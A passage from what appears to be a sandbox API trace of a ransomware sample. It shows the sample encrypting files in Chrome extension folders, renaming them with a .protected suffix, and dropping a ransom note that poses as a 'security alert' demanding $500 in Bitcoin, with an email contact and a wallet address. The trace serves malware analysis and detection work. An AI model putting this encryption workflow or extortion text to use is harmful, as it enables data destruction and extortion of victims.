(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.708] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.708] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.708] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.708] CloseHandle (hObject=0x164) returned 1 [0080.708] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.708] lstrcmpiW (lpString1="ta", lpString2="Windows") returned -1 [0080.708] lstrcmpiW (lpString1="ta", lpString2="Program Files") returned 1 [0080.708] lstrcmpiW (lpString1="ta", lpString2="Program Files (x86)") returned 1 [0080.708] lstrcmpiW (lpString1="ta", lpString2="$Recycle.bin") returned 1 [0080.708] lstrcmpiW (lpString1="ta", lpString2="System Volume Information") returned 1 [0080.708] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta") returned 141 [0080.709] lstrcmpW (lpString1="ta", lpString2=".") returned 1 [0080.709] lstrcmpW (lpString1="ta", lpString2="..") returned 1 [0080.709] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\*") returned 143 [0080.709] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.709] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.709] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.709] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.709] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.709] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.709] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\.") returned 143 [0080.709] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.709] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.709] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.709] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.709] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.709] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.709] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.709] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\..") returned 144 [0080.709] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.709] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.709] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.709] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.709] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.709] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.709] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.709] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.709] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json") returned 155 [0080.709] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.710] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.710] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.710] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.710] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json") returned 155 [0080.710] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.710] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json") returned 155 [0080.710] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.710] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json") returned 155 [0080.710] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.710] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x150, lpOverlapped=0x0) returned 1 [0080.711] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.711] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x150, lpOverlapped=0x0) returned 1 [0080.711] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.711] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.711] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.711] CloseHandle (hObject=0x168) returned 1 [0080.711] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.protected") returned 165 [0080.711] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.protected")) returned 1 [0080.712] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.712] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.712] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\RESTORE_FILES.txt") returned 159 [0080.712] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.712] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.712] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.713] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.713] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.713] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.713] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.713] CloseHandle (hObject=0x164) returned 1 [0080.713] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.713] lstrcmpiW (lpString1="te", lpString2="Windows") returned -1 [0080.713] lstrcmpiW (lpString1="te", lpString2="Program Files") returned 1 [0080.714] lstrcmpiW (lpString1="te", lpString2="Program Files (x86)") returned 1 [0080.714] lstrcmpiW (lpString1="te", lpString2="$Recycle.bin") returned 1 [0080.714] lstrcmpiW (lpString1="te", lpString2="System Volume Information") returned 1 [0080.714] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te") returned 141 [0080.714] lstrcmpW (lpString1="te", lpString2=".") returned 1 [0080.714] lstrcmpW (lpString1="te", lpString2="..") returned 1 [0080.714] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\*") returned 143 [0080.714] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.714] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.714] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.714] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.714] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.714] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.715] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\.") returned 143 [0080.715] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.715] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.715] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.715] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.715] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.715] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.715] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.715] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\..") returned 144 [0080.715] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.715] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.715] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.715] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.715] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.715] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.715] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.715] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.715] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json") returned 155 [0080.715] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.715] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.715] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.715] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.715] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json") returned 155 [0080.715] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.716] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json") returned 155 [0080.716] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.716] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json") returned 155 [0080.716] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.716] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x115, lpOverlapped=0x0) returned 1 [0080.716] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeeb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.717] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x115, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x115, lpOverlapped=0x0) returned 1 [0080.717] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.717] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.717] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.717] CloseHandle (hObject=0x168) returned 1 [0080.717] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.protected") returned 165 [0080.717] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json.protected")) returned 1 [0080.718] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.718] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.718] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\RESTORE_FILES.txt") returned 159 [0080.718] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.718] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.718] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.719] lstrlenA 